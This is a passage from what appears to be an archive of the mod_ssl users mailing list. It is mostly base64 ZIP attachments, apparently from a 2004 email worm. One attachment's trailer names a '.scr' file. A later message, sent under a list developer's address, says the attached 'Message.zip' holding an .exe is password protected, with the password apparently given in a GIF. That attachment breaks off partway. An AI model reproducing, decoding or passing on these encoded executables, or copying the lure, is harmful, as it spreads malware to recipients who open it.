bfEpez6bHk7ebWtGG9HWhDWNLKqykMKavoMU5i6WX3Ce9VmS70dB0UneVwZLPZ2vCFXbACRf
RdIThyHftW66NLjakGjYEGdj91q2jNXYvrClaLRBvlZdslhOhDWbYqiDoXBtt+WHU+EWUD3C
IeA4ePh7heOYgEF2Qco1lu3QrfIwGJLPcFdIfD2ymIm9P1P4UC3dUR9HyDt//FYVYd8rt+rR
kBYZTGXz3GYqycQWLm9+v6IVqNhEu4O+K5pZiu6VJuu44eD4EjkduhnOAZD2/VoIm2pd7K48
Ta5/Rdealj+2Y9ViAZJ0GeC3GMCNLpyceTicap38Y0kPwceLzFhAH+OfLZwBG5t3dOpkTUyt
dL75dRO712DsOyWXN3vDP81C8QPHu1xR1y9dwPVLkpHJ6ym4df3+SJVFsRP1XOSQcb7JzGgN
KFOk6Qu1p3MtI1uWmgWNVbfWl5c1q3C4Xz3gkP7+r1+IoJ8EmvrQgxwy/fnjjqBdq3rUn9Pn
EWhAYyj2nyVOONd+S4m1KolQyMBBleKkERX4nDRZj/bhky2gOLWsmEdxagM2IpQhBBDBjm5K
i2Z2sHl4w3hmh0atAHBbRbNc5yBs51sfuAHVZXBdT3K3kjzIG1N8ge1ZmICgY+DMzGBiVie7
fGPayTSJeyP6QU25ysPyh/bXK+HfGQXc09sgakrgrc3qjDgwQp8A1yjy50ZzMsUZzSyCIy41
sB23gMBC0o4QswDzoya+XlaHGrIpOiDxRK6OZ3WTsxI/tO3YsZAH56sWMpgAg5FCAF3tUBRE
/ZW25J99eArOghPUOiyahbygOWwO3iuzmZznvTaPPwK5Dkrp19GMa9kNBDCIr7foA9hp+STj
KVjQSC4ZhHcXMcDPggHmKCL/ddyDG1EA2F4DDVtOCBCn8Gb5iF2kRJWLhqsfkO+El1CcyFBx
xYFr9A9wWq4p/xgU4i7CAhiwCUPjjoG6mtkNUsZv57Fe7BLDXbVtGuJoG9ZNYmpOZfGAp8MH
ycuqhKpK/Jx4z3uumXYb6vAeSl9qSezAUA3ISZtDnjUzxmUhIUnFp0LfdqmBi4B/ahzmW33b
srik3jVFrk2JHYJHpKuthLQM+2uC7X0gxFVerqxNQNfc3TLwmHOAD3CPV1kJO6YusmckzR//
h+kr94NHuDQtN0ppk2y41ILujw5cFGDzL51aQYSvL2+akjcterEx9G1jIMw/ooPqgxyAdHzU
gyh+bnm8Aix8MuWHajF+dXzYCZT6dfKUnyyr47ovpxsmSeQuCQxzkQ5CEMesjIBFyPWbFraD
SrfA3UPfS+W178dUHixKZCUQwm8zat6HN/1XVwUUEeA2C4q0DwKuvULE8x6ceGiobeDBAg5F
Q7pP14riAX2JUY1/Whn9NSBgakbOnYIePP+dH+G6EyWthPZ08Djdr5NwUcriZ8WciHZvuwiv
EkFa3rZNTHyHYybBXX38kyEeFCFM3wf/Z5lOVYwR09a3oynUaNqo6iUstnVrzfDm04eEI/DT
59lCsKrWV3bj0MhNtivftvpsb4JdLJdu9Y/+tYDIgY8tvltueaIZ6+8NIAUagcJ0Txo47+du
EmfHUFBrzilMNdoYV/K24kLnSkr5/XEaRyr99zX0G1a1sRQCfNJetncYZ44+oxLuPp8JlsRS
vcxiPkzJNs9TD+RTci1+QdnzFvlI7e4oWZPK7CkK9KUcP2Od5ujEgraLBIOqqjl588NUab3r
2YRJ1xJ3s4EoKOtOY3pmhZEJYGkj7wuwh7ElUAr7Cq4W0cwAF5mr2sEPBzdFjdUhwow6duRI
ZMfS+O+TaBf9epKvrLrbdW9t2lqBHk9gnx2VFPaxHX33nErJQ/1LFkvXJEaO7NWeK7sa4dAX
V/1+XrVgUKFVMRt5Kn7fVia89giQmzUtNtCoPsd5n+JYAtEJ5PfJSiH6ewOE200luQuoVzQk
DiKH+GGBqIiNs57/Bps+50ZifixtE4CseU0aahmX59AV6sqbniQ60BHORDJQz9jrOwB53Jo3
xotqmtNWskYoG00Cy8NQLLhzS2rK6mZt8qIyTF0h/jQmiA+AiYWKjhm2SfyEIfs9Ox1DbpFY
UjpL+4LJDNO5jCBhisZIvOrbQG77nFbR2aPztiIn3hk8YXF/BKsRxMctiSBgxH1F188H6Udp
ccBVB/H6WTFaUV/AHjUZofso8lV0JenVsXX/4nbTSOCAemY3cjS4P4nYAqu42NqIft31GC2Q
ahCutTLItXSuI8jPBPFp39BWjJBxXQzqn+JqPnL4T9u9+FTW1u38tyrIMnQTD6TZhjyGFr/O
qndA1muNNtb2/ze+O+w1LCN2nq170ph+B6l94PLfyVGF370pZJfGhaSAj6YBIH4Aws3rsKFS
7MZeE2bPdknm2JRag0xD1v3VrPVJ11YYWsAN9MtZP98yUuLc3Coahe49u4qX7By2pn+6hhsl
J1HZoEyst9YnSXf0GU4uT9q9zr5cHMfxB3fNq35dw5ZQ4JEDSnixnQId8KyHZMjcDiJOLdgM
kdW1J+YulQI8m/Gq9VNXOD4ndMeALu/ytj0Qv6tnGwgSpw9wNkBTs6yXjpEhaEaj7dpqgz5F
9MZBz9wKxkI7IrZgpWuJp/c1j6XsQ0ugjMXwC+WjOQrWg8QwO1vXmqVFvDqndfd4Qnf/qhuq
oqglmbOWXzeyJsh4oZUhLD4mFZUBuMOe2bz427Kk8ajv2gs1nDJwyyr1P/mEZqblGRit90PN
zGJozO+uTCmJBFf49yKPdJFEQEtQEaSVbfdcSuf1acxj2Xm6NmuS4GEkxp2oqn3tixLkUMjd
iYxGhkEV9k+hDHjUKIKoDLOAaFHN9ITk6KEtFibFgjiXWqqtZjqxt1Ivg8QofTz68q+fffM7
ZEHErN6vSLO8BNq2LAcLnQ7+3OdEZxujazdo9lw1yRgnzJIbvFqPj/mY3KPk+R1D5vIzQnUD
k4i0iNIsHydC8FzcbvNHVne9zDvyLVIfCgVJi6hUhFtdkvLyG9nkKvGxbbHC+YSNZv70M9BO
pCGb/MWlLFvnwD2qmd4O2vwiQgqGnJkJdC+IuJEZwSweczZjiBk6zN7G5UYM51LZcAD+mg66
S99AOxkl+aJmX7LDZD7qcz8JQrSun9yaI2OVSdhCJeag7pGlWpXtSnKc3N4zeR27v7arVcYU
CXU3tVARqbp2WdEujvvTFGndTTO0r6RGThJ9rF7WcHEztH0+0Vd9uBDKqIgOqRGfU3RSrY8v
ns+qGUg1NuFcAfopEvTyl6qE8ScLIXXRj4IESmbmGBUNqjDMFsiejRkprhYk/3FtSKSRbbzs
i9RVqrjWJKG0ve/FpND6L0yeQpzqIEPwi/WENQp/PFBR9RczVCN7mDcGTtdxO1MSZ6s4rTYj
0fqdpxMhNLLMTlNqmNpUkSmL4muHr2i38SwDa4J8i6lntjQ8lH17NCVhRxPrQJz9EhVNM5mM
HX+SJiNoKUJuhz2xDeR3tarlvgBHcTFKZ+JizFV1Ulhx1i39GfOMm8Y0rNTsa0c5HgD4d4iK
JRvqRzZ7SuTiBKNh4w1wfZpNuEEOrWke+9yjkAmurTTpHbQ6CuwC/9V9u0oJqHhzdaYQgjR1
5TOg37gLukLHNNSfQRJJsYvji/clLrv6gjyKyXYRRq1M3s6BTyVcneJjNcyJJ5qzifIAbFSe
AGqYWNXFLXd5PfBUDNGuhcyuv+A4Bhwdd1tDvY5wJgoBbrfckLmO/lM4ht75drvwnRtKwM4o
QCgnfm6WUilYp5Df3unuJeREdO6BQ/ARqzbixXbo0C6tlsKDGDWBWFt25Xs+mC3hZsFrE/8V
U7pEMsvUPtP+2gT20/hgDujjVmixq3zif8YCwfpHfkh/EwMaRtFwc80VOMRCPJpDqP2RGUgc
XOiuQvaZRXag8S8NKDthAuzMu9DKCTjV7z+oCJBflqLKXv7eQS7DGf9vT8ztlt2wPMSVJFx8
mxq/At/e5JCbhQbA9fpwbs65C6eF+4PzdHS1ul7VH9PYCYspCXjMCWzZlBFShE0cY8Kisv2l
nOUcYGHXahs+A9T24EKoQtqhlzvoHk5Qzn2xcbjfZEg6s7z5KEOjbNXNyU156Iupt88e3cXH
UDajdAKFXiRqgz/aJm9w8UrP3tXZdt0mjU4b8avohaQMellVw6IJcSeeuDtpfhVeCDRtMtRT
bNfv3KIirYaGrZaQHj7m55wczm6kt0v/LNbdfoIXsrhkIb+GMhr4vnU6dVyj8pA9n1hMX1KD
DzG856jvz6q/nJNmAE3x7/5YZIQ2jk9kJo2m3XknJPHvR5I985QU115YihTVacGBSztr15yI
siW8ciOymsRnRrYoX/ioMVvGPOeYSajVZCIeoJMU/HZZiLtCl5lVRISz2WAzW916EP7nPFOH
UQq7LS+JZqLkfza1gP98fzaAgwp7JmDT4ViI7OV/Pw1d62K4c4m0Fb4oYNkIDjTwPycpk+er
AXwmiD53jo12CkUcMTPIk1TQ9OynytJvyXztLRN1Y6SWL+TtdHMfU2UYLxen9WM89EaZ+2ID
uiV9GIC4gR8445O/RHSNfmK+RkAaM0/Dah5JHNXD8gIgfD4B+CO4LWQH0ybNY6i5w1TecyJ4
JS2fYCywRTtVW2Sc3v48nCxr8U3skr5L3ARe4aues8ELXWALX1GPVqhyvtUcN268u6El1xTI
WyeI2zIzv9RkxAB9puMQThrTRMNq8m8HOr+3nmrnlS04+aMNlmwFkS7OEdK5KWQOzd2H+i5q
aQp5nZbxV4qW3GHMkwFDECIDCdZDBjM+48vZsh3JEY5ywgim1rELePH+GgSZK2wk4XBRguFo
kuwBRPgMTrvEplil4Kpq4TLC4bBW5sqnGahHLzWIVyW/26GbLxrxa3Pz4RzbAg9XIbuhQO77
O8DrkOxYLNlxqCngmHPfXJNKfNQCeG60Xj19wBD68wBWNlpgGUu27tQTKbX418ESw1raBrdj
gC2urgEz4NbSSX4XfxSdVLkaUGr1ukLN60TLSFORQlC0wZ7bwIGew/aw1KFEaSlZTkXL7IH5
YApUZpPR4b1tBH861IF4hj6tbzXZDNLBjzKSeFS6CToTU8nyGoFvJGq9tw73F1wH3LsfnhIj
SRHe1PrUBeBuMiZP/lV6O8HuXMEl0+tW3FjA+MP1uwKNawlSbJtT7b5a1R0ZfcHZeCLeC5Xv
kvDZSAo/I3xFKueTs3UFODD0mkemIQpUift7sHel4iPWJ8zcaQnLz71aNmLTJasTDWrTOWTq
uZwXSGK5Vy64J77rd+QAjfVpZ+/oSv/JnUdoRga9efOmnSC/fufyixsvFWU5ScAYUYeQXm2H
z8dXEkZ8w7rWVwS/9GW3tiCqWcQl7LW2jZ+Q9FxPEiobxx/PadaXVUpKvaJQthx7YZ3lkZN/
bwwmxHholnZIq09/uq4Huq0wM2UC81+s2pTcgrt67wKXlMl1r1n+ah/fp7S58+TCKadtEFn2
042yAM+9oMa3IRArSbX8ElS0NkbiNL34KCkT1uhdTOn8FZAhFrGeipyXGw+uEHnq+4fpZPTj
aEe1lZ/YYdVd36shCaeMlw53gC4o0OAiMx5fkb9ADEKmRSt7t17TmIBleYjY+uPmEHGUjt5g
ROK/+dNf9o0QP1vVJgwDqnxIGoryfHEDB7gaO24Sg40qjL8tKtkeqw/4w0jcD5l/pKcc857I
v4ViB2XnFOZmU4ZNhX/Wqlt4IY08Ugeiavd0RgQyVObsEarfrXc60zthNKYRrIh43N3GIs9U
FVBP+WQh33BAp12510al78tskkb8hIlIGlSRFWolDysNA5pW9wH89W7succQr0hZ+Gr0w6Gz
ggV69JyTLm1ezbjQLHcwZuUXiH6ZrC0tUokImMDRM6QYGMZH74wn5k0XeN/KRVzuktDHLGnX
Y05VF332j+d1I9vc+UWi/O5Q1Uc54ZqMYlM421D2kVZlySGct2wMJ/mhqAAPjl4P1Yj3/yoE
R1BIeOkvsv8nMbZMN/ODk6rKQDcYF5RGYz4jpO9/CVE1SWBYVjvD7rvwe/arGEtGFg6ryvIB
2KzSfMBPV+IUjmIq4cjMo7Lv6W+mpggWyh9sYzjesBKd9lQNTGZCVYiQ3ddjQNSkJ66OcfW/
yancjeljFuOrYcPXtAFJNZo+Sf1GbG1o8Dybnor+PaAsvgRaUzC/VtTPg1kPEqSORiBgAg9/
efAyEzH2fKh/l5BPsHGw2ffU/X88aQ9fBXdpmuw1RkjgdSZpkLGpc/MpTb5eqcYlgLZzmy82
O1fN12LT93DGE2h2UeecFv1Rt+02xMUrbNvmZ85v8Wosl1ZFMqfLlMfABmk7jaXygIBITaZZ
gzO9twKbqWhzNw6OxDKPzsiPsz3IWDYtoxIpFcqQYovYHRBgX/hFPlyUg9SjMNrps0swp09G
oQyKune9Aj25lHZDajdNJX26JOH+ZdbQu5ozwu7mZ/dsS5CdBG7FeBCNDMQsEbtEU8xf5efu
W0EQCFVD/geTgpaHI8Y0vegrfg+ZuTGGouIIqFZq1HZIxK3vQBGlHp0Ig8dqSMNA7TBrGl4A
yM0bdRhyKwoOFF317UYkZySVb4nzFfHigPxAuwp8roDq/GvyX/3x7Bz1Gw6MqBrlw8+8jFry
4yGo335tnorqtkBlBkzQWyCC89FNxoJFrGLNQxsEfRCZ/F40iqjwl7eRoI9hADhDNwXHr1xt
ox+XNjDMRWpgcIEcoQoz43PjpOdIbnUzIIPUFzYW82zcghm0NhPybgUjiyXCGQRMf+Ye6aIX
X771jJcwcLBKekvSNzw4kqIYuz9b71ogbTjNtCEercOnI+17w9QiMUQ55LkpQIseMFn2Nq/t
1qWXuXeXgQjgZgwF3y6uJnziLh+Eu4ggmB21TEwXR8RjcbxD/oZDruJdCa0QdtIgkAqS9ZQK
2tmm0ATVpA3V4rjh0/ySK6E8MQbjcZnlKbMGyYWRedAYKGbZRj9aoePGwtPxRXzcoGrk2gOb
MwIQzH5n075Ip+uLhuBun67UPtEkiZ35IL/YWkjwg0UjEyD63u646dxMPE01SDayk9GbOkhH
4uCQuXtzDcl/uLjsfPfJjzoN296yb6evNi/Gfj5RAisTeIYJg0GgbaXyGimSPJBfcgIWSc2N
+yTbVVzdRo/LcHmQTDK8mG4/ST/X+LhiiCwrlDlpAumEWpID2WJRQFa04cf0SFH4oL7ktE/7
RtBy7dQKLVeHYJNE5/FX3kLW3cZI0FGFFpe4pqV0lTMKfVG500GLYQlPwOSsj02yyfsIDfFm
RnGCOtTsHRbwCN84OSJ8tqN24XHOT3LIKuRclvbg/x/GiSUkMGza956K2Mkdu3O/18NDwBG3
payeVWE1aSN/6fWmQ8qZQLcv4AW4vq0dbDS2Pit4rS3P9/DDUQwE0Iu4/zFQTsVDLEXSd3IH
XPqyr1lpJYFxAj4Lk6npMY1BLMLOwMADNpZfPRYW22cK+w2bP8DFx3QDUaHvYgISWvyP4Om8
Koi3RWwKN6RXNsF6X49I1z6IH+z5IGOu1DXvxP2Yk8Pb1BVAGHKOfxzu1u5DJZf3zSD8SOpT
ltDAz9OZrJ9cLWe9Z/U5B2W+rRvPz9bKAPnNP6OnwvjCNmGHeoHdYRSVYMelmlsL5aqGUkD5
c/pRyjiM1xaCZdbfFQxI1LBGZeFu9T28TYmWBg2bFD6EFgnv8KQTGf+LUwFw5Z58AC8KXDvP
3X8Gd5GQuKOCodmMM+orONncBRKKqq4o9dW+0+QQ1mWVlpdorYqQZXYWCAEj+wWY0OHXvbpC
1Ifeg8FXaD3rTXCw6jdL3KW4AiVyr58E1SIF1NXCJsMw5Tl+CyVO8/obR7jjyVUimgV6Qe5X
aJUuwa8pU3iCB7PwuUwzAS5OiwkEoWh2OthsbdaBk9P55u0KD5iktsQpWSt1oyxHq296dN3f
YJYhHmP5USTkTDtz3sxpBSkg/lxwdiLPkjeJA2/81sqMWybnPHjTOFsV82L8ixxvowj7syl8
KNpNh+kCnWL0OsfIHAKNPFXRGI4ae6RghuM3+wllO38Q/+TVQUsWGHrzsHGWeyybXr3Bw0X7
gH1GrpHo1Fnx3YkyGvb1EuiALnKW2bYwkM02YemUseKv+hQI4edmK6F1EUH43hm6xoLI5qEV
dV/oR/9Sca7rHUpnSoETAYSVHujtraU39vSvhf5sOgmNRNcItaX+2jy2BQKQx5k1dOedyvNc
tSUXiYY8V7pc6b3pm3tzNEVtp+strO/gVOl2Hgp58NM5MT4QlRK4cdC7XNx4snQj6NF1/Su0
9ISP9HD6g/M51Bn5vOqo7778rzU5526BXDUv9BAEsy0FBkp/sjBzAPBVBhE6uiPaqpjIcUaE
1fWSSHgQ0Cnkfmvi6C/NYrd99beBr03m74sgMlsxj2G+s1DsOQ6kwE2WBiaFF2afc+rIK9tF
8IHCx2cH5GYUCyKSexaVsypqrhdvfd7LpK07dxVWp6SC08lUcNN3OmgfJgchBWi/pODWE0Q8
GjvIBpxV5ofLHMC4G4jnwVWMB7QD8MMuH7duOTUPkMx+ScYIMvSOXHQpwYXSuLIQPbmQqxqm
hv7IXuYFoL2iOjqv9smcrK0aGv+QoojUFqxtjNkGb6n6GkKK79ZGWVCoSYUT4YugkOU39Osv
EPtyOIv6S/i6WxgkR5VOq4tSndGQwznlUDG9OzywUg0fEBDlyK+xra/cna8RGday3KtLSvsu
zm15GywZ52kPOjXqSXxdsCwrIyYklwNNouFRR614gx5PHF9y+TSeDuJTPAgUIltR8GgYc6jQ
CGMI/e2mow2rx0TlRcsd10riUMuNg6YMEYdeNChwT+w96y8JcLhKSmAQFbXi4ONt34wF/ccp
OWzsDcz5YUQssk7Ftub8piKZ7eqvFRpWbGLdoICFQxVXO32cOOn8q7UIFMNuF2//9ebFtV8H
Da3sYOAUCIRZzhfgPr44fkRsf33IaXairqbabqQfgECS/K7cOc6u4aWX/G8DpPLmLBel9fjo
xa7QYEKTGRVVSMc3K1SF83r8rDrBdXXIWxc8PEjj8/R91pgCcbA08XJVnTVaBP8HBV1KCTVj
bOu3Vx2+nYDb1b1VfFNt+P2/bOTx+nc1ajmK92uCcEFg5dbRyYPJOM3zBf+qlEIthFoTNfXR
uORwtbJswUBAKp8BzZ0Qw1pgx7jNgMM5qB2n/T6btZf8CO9GwPVuHIKz+H1LKieyUuysxiAY
3JGUE21u5rZw3zVraVCMG9tKEHNR/yqs4+yElumGOWWcnHeVYNUwOnQU2GUWkXKXYIIFrxKs
tGaIVMHAn5ki97O0YXQ5vrGfSPl87n+p8VWtN8RqNaRMJHb5k3xnqB1TF1WGqSxaZYKwWNHN
1Vd07lRHxFFeLLDPKd6LV/Svp7JuDxYjhAKeBV3mDCYT50LcPSuul38/copXdmwWoacb+xlK
1C2EKDI730dLds+ZKWq8j8IL1UoTd6n1egfJo7MpZu+uI3SeNmw0DSgVy0PL6tjwqeoQM/GI
0Lj6y98whPXgyhIqK6pDWnQeplxu5P24RMEHb1kE5vxi/X7Oxd2wGACgAE09kEgzcezYCJ5B
fjCDlyRy5H/Bqqy0/evE4ezfAwqLGVR5GrCzf8xc9y4+vRkZtISi4cAzs2PR6uNBUrbxalqT
w1gaOxKMsWbvXWiu8EI3P19tGkEqB0+WWAEQSyIijAXPRzgwmKbuER/fhR7Di0WSSvlw4/e2
3BmJ29n0gQ5riTWjLGH0PGu7h+SpQvtE8iksC4G9RJ+xwOYhzFb/oUV3GBpxDGSSlYPD1UEd
v/ZaoE/PQKf/BhlhFMSKzRI5R/rbxfETAdhT1Dbb01lViI5zn67SBCGQWg14Y+ylrBwX2/bT
5N8U9fPBdK009L1lDhbL3PW+/xu/Q01kmlPxaWye+7QbsreXxr8/3IkW/VwrToTHOCUr/0Eg
PvquTdfTzspvzUKPkh/M42jd9yONhlAXv5xVeccWEsPb70ZpwKPn3peX7PAor2Bk71yT3N+/
zQ887WOBCc6RgxWseZqVqQnqV4ExnnvVXKMP51NpB2J76EbJOo2y5blsv/OQVsqlZjRiEyvw
ihMtzBJoZMEZgK1yiu8q6qYTWd004T1Qw/wcBqUfIBwVwale5gkrRLUDOcKEkwpiVElBWB16
B5vzV7EEFzXVebk60RqMABxILh9eey5vpm20HE9bXM+Rf/kEr10GqBM2xT8DPX/KttOoMTtw
Uq78ji+7vHl+v7Ykstu86RuMY/jTAsryQHEVycQpBfGmFF+esJVxxsvD1tHGVO4Ia2mNKDnw
KxO1ikynXn96Mck8oxo37CX+vdHAdLEU90DYHyKAiu4jONYrbC/ZK1DWRRdo3ykkY/93CTcW
GclCr8YQoWaFJmFT1teU9IjtlY4FHLfX8kpRjTpwpyjv594qsHCQUR2GeDwe4OCIQGTZQpUf
io8r9Bbj1jyQfJ5Eg8ncEoDcuvdNM/X26+PCY7v6afka1EmcUsx4gmmeoi0tRI/NMV4ILgAX
z67IqKR+gPuklU9Lo/rpqzqhKRGwrpLLppMm5HFekW+A6SLfS2vZe8+XDm9kHHbAIPifi+fg
Y01XbWpS0r7BcN7xcGN1VCzE/PEHjWcdGb1wJvkN7w0hBDZUoEz8xUsm+jrgfNMSVEwsx7Vx
ODz0Yo1WUpz75kCuyuzKifXnSToSxvGzYATMwDmZswSN+crMV0DvdhYAOOUmhmbAQm8rx5ud
yfW1UxeVp0d4mUM/dsTvt3uR6cA+Ks6thO1oUjsJ2kJ3SwASyd7eTcumWA3IWeLV3sj3zE1l
Q1e8EQq2hHbrlY076OisQCC9moh9aG5Fqb5Nu1kA2WXW9UJ/W4GwvkbaQ84gaNxVI42anhx8
rTDA7dfihOcLjFd1vX3wp28cFcZ3VeW4etXtP55WMUYf828ZpGZ7dFAzBpIyHr0PZdJSDfh8
/qJx285dM/2AT+3t1JDJz/j5ummA2ilucDKPp4558vNaAkmyvdFuhvRqeaJbrKcRXcYlR1ma
tUfPbuUEaGnPSY/+F8uieuDn4AGIxM0+17ASuoIH3vlvjd+edFGsPTeGu2RBiFca4G+UFJyq
g5VH3KEQGxhom1dyuLz56Y2SY4C+YNSliL+p9vD8AEfT/chn+LDF0K+RS69c1f50Ukx0bzfU
2IIOqV0UFl/4FUpNbmad+udBbhmDMucLMhbvj2Mi5uYPgw5Z9cX2NoGh7OlzNE+Qk7aunBt7
zH2UjAQcSKpRo7RMo5Ord8r166yvH5r78MR1HzRtW6hnI/h2HQ9k/jqtf7bzjRxEMKzsuggF
IIWDARCtwENusiWj2HaDeir4rQTZmvleIGVfYckldkprvIfe3c5ocRFEwnmmr9BbByzJyzw0
ZEFyBRfRVFXpyXTVNKJr+nyly5DXgRUQebJTEs10Q/LlAxRsMHbqL4yNEEMdyTpa7qzmTkHs
S39fWIeeYIenJrwq7K2Zgoi38Z8n1bE79D5WvhQCDSWXGfJGyIMXYSd/WmDtPgEFBtvSi22n
jHml4rb62vaC2JX7v5IwIXZXIeMFF0nOch+E5RrdPztK7kfY1VlbSL7DWrXNFyaJTx+v7nEO
+zf3TD73Gg/55Gow15aynCs2P5Q1cqO8BSHIgt733s/SPZ37tSip9PDboIq707wVus21FYTK
wXHZJzoX+CG7tVwFsezWBQq9mkuH9a6yuMWHfbRW97rC+ZZ7ksrRZo6p5Z1oaPjjYYEkG6ku
m5kEW5O/+5KFOJV3VgqsmduFhVEAFh5vSHQ12SrO2iRd+MHgk4gHnqLrb6f7NwZwB5u89TE/
kdQX1BHBpXm2NG55al3dEQtIv5ZXz/Cwy+uq3IHamE1ZBB3iq6YdoEZzDNm0tT7ZSSLPFQfF
9GqzHytzQhcuOaZLlbw9bO8+cDRRketrelDTv/tWVbMwsxq+K3vPImiM83P4HWsbDMjmUzAB
74ILmcKdqP7L9+FI4a9b0IyxfErAQSZ3DII2nJwGK9mQqdgcYl3QYLqoy2y2GR1sQC74HQWA
XOJtCUOtfvA9zp1wqq8GNXeWHAWrdZYGg13S+bkxq3DMzoaZv8jDT+p1dWUg3UpeE0sREi2v
4H0NXBgrwqXSHdcUkFMYdz+oMALmSjuBKakv+GrbTDWKjX8NZRr9LQ2/79BmA+z1TNmBufyi
PkHRHLbrXMtpje5i/fv2E3KU4HnrwuIHKPnjjRC3OyGsO6rV9+sSNJCMNKfntYGz4/gUckdL
Ey6LvJTFqShAVdStq0h+6sBxX7ym+RxnqwquOFPO6+1Bh1p/dSyGP1Jfst6Qc2IxzzireBMo
Ja2/xgTaLHB1EnGhXIY22YORE1WmjyaNcmwg8gEF+Y4W0olq4aThggw5iSArskDgguuDrae/
DhLOE8Ie7c9HHZDLBwnkMBcdAS5hBE1aJN+YxDhfglwcymHbnQG5k2jERXMp25qsjgib9RIa
Cybw+10pqYE9X9akCEyzw7EIoMZ5yufO2EL3hxT2K0P9Ckn/PoKScBw5t311OW1Eny/TwHBs
DuyyvYRbpn3pRLi0UpBl4OuBGaGlAhhUKfiajNtSwnaeDhtReUllEyBqm6xAOLWjsObv2cyx
/TRYFiTsLHQyWalg9smGtIv0OUT0EGhoFbytjpoV3rWFZFY+UyTXixXM+/U3KW16gCydk6x8
Qm/ExC/zh8CYyiDKWDURsdTmmtfZMGTiRerqaSUY7lBLAQIUAAoAAQAAAOBFejBFwT9MwGcA
ALRnAAAJAAAAAAAAAAEAIAAAAAAAAABjeGR4dC5zY3JQSwUGAAAAAAEAAQA3AAAA52cAAAAA


----------hsdjuwgwqrpgpyqmywwa--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 26 16:56:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EC9CCA897C; Fri, 26 Mar 2004 16:56:46 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from Bennett.org (66.169.200.125.ts46v-19.pkcty.ftwrth.tx.charter.com [66.169.200.125])
	by master.modssl.org (Postfix) with SMTP id 1944DA893A
	for ; Fri, 26 Mar 2004 16:56:44 +0100 (CET)
Date: Fri, 26 Mar 2004 09:56:43 -0600
To: modssl-users@modssl.org
Subject: Incoming message
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------fmyfnkfsnkvdxrccgsxa"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------fmyfnkfsnkvdxrccgsxa
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


Here is the file.





For security  purposes the attached file is password protected. Password -- 





----------fmyfnkfsnkvdxrccgsxa
Content-Type: image/gif; name="oayqgxgrbh.gif"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="oayqgxgrbh.gif"
Content-ID: 

R0lGODlhOAARAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A
/wD//////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAz
mQAzzAAz/wBmAABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDM
mQDMzADM/wD/AAD/MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMz
mTMzzDMz/zNmADNmMzNmZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPM
mTPMzDPM/zP/ADP/MzP/ZjP/mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYz
mWYzzGYz/2ZmAGZmM2ZmZmZmmWZmzGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbM
mWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb//5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkz
mZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZAJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnM
mZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwAM8wAZswAmcwAzMwA/8wzAMwzM8wzZswz
mcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZZsyZmcyZzMyZ/8zMAMzMM8zMZszM
mczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8Amf8AzP8A//8zAP8zM/8zZv8z
mf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+ZzP+Z///MAP/MM//MZv/M
mf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAA4ABEAAAjnAP8JHEiwoMGD
CBMqXMiwocOHECNKRCiOm7iL4grGg6cx3sB44tTl+ygO3siJBuF5/JdPXjpx+AT6w/fynkB5
4vJxW3kvp7iVKD9yG3iRnDh/ArlxS8ctJsGLAuGp+1cx6FObMv/B44b0X0x4GQni+yk2pNWb
XAtaLFh1oLqQJwfuPPvvrUGzA/OVLDg2rtapZ/1xwzpwrFOZZNmmG3gP8Nmeh2+KI+y1KV9u
gMF2PatZIze/nf+BbDn5H2S6AtsStEuQ6UB/68Slw6pOacWwqHPTtXjbIu+LvjECH47R9nDd
yJMrTxgQADs=

----------fmyfnkfsnkvdxrccgsxa
Content-Type: application/octet-stream; name="Message.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Message.zip"

UEsDBAoAAQAIAKBNejBvkPDqQVUAAMpRAAANAAAAa3Rndnlqc2J4LmV4Zc3o+lZkfz0NNkt4
gvy7pXFip92z9t+g3VmADPx7itrbxOm/X1j9SNzyeB63HegcFfQldQ75KGVRvT8u2mx6EU0O
x9b05qVbiXa038u8vqLL4b9Pe6BzPtRVsgUwUx9jq0HBVmLZRkmM/zjNWpyU6v7R9WWqT1gT
eEoYS0twaoe85mm+d+Es3rcwGbYv0UqW4WBBTEVqsbNup5sBzbAENX2S4eP1Lxc6XShaAXnE
qpkry3z6kmJcmkPlDKoqRwXP/HJeGVkbbF0iXpGQ9kYUymAzC+6nylWg+HAItKyqGgusBEUt
